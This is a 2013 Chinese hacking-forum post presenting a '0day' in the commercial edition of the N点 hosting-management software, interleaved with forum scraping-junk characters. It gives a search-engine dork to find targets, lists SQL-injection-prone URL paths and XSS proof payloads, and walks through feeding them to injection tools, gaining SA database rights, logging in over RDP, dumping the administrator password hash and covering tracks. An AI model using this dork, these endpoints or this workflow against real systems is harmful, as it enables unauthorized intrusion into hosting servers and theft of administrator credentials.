找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2294|回复: 0
打印 上一主题 下一主题

N点商业版漏洞通杀0day以及利用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-3 08:06:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
不得不说N点实在是一个破东西3 L% F& L7 m, X9 m/ Y
就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂, J" c/ q; p0 ~( l+ w
好吧 抱怨一下就行了  接下来关键的时候到了
! I! q' P, d' \0 ]4 D首先百度搜索关键字:inurl: (mmdatabase.asp)
5 M' F' L! X4 P& i' p我随便列举一个:   www.xxxx.com/ |2 V' m1 N/ u: g1 z
修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1, ?/ |& r9 e, X: J# @( U& l9 S6 j
扔入NBSI 或者啊D等各种傻逼工具后) C$ w) e! I5 g+ ]% a$ ]
你们会看到是SA权限
7 H  k6 c2 d* z) T) Y果断3389 上去  hash得到administrator密码. X, {- D6 B0 U7 g6 \( |2 s
擦屁股走人~  l. T7 v7 A8 `: v! _+ O
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的( B. ]1 \3 z, }
  l; E" l, S- Z9 y
再附上其他几个漏洞页面9 u- m; f# c( Q* c
SQL:1 H& d" ?0 D1 M* p; [, J  m; P, U
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=17 k' ]. w4 L3 v7 D
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11# l; [! e9 b0 }3 {/ r* f, V
http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
% d9 o& v3 V& f; P) h3 U% Ehttp://www.xxxxxx.com:80/Style/vhosting.asp?classID=26 J- Z+ o- P, S, S2 W1 f
XSS证明:/ R- N& ?4 j5 z
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
' H. l  k& N- mhttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”% R% N3 ~( O$ _0 c$ X# o" _
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>
! y: H3 l: K& r) B8 q1 @由此可见点就是坑逼中的战斗机   自从用了他我的眼泪都流干了  有做IDC的朋友千万别步我后尘啊   便宜没好货好货不便宜
- K; ]6 h& z( i1 ~! M: C还是星外吧  你们懂的+ K+ @! X6 [2 x( S
作为一个商用程序   安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?- o, z- u) L6 F) O; p5 D) A
PS:其实我真的很想知道你说N点这SB asp就asp吧  为什么asp还非要MSSQL  这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。   o(︶︿︶)o 唉
1 \# r1 m. G; I  M——-
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表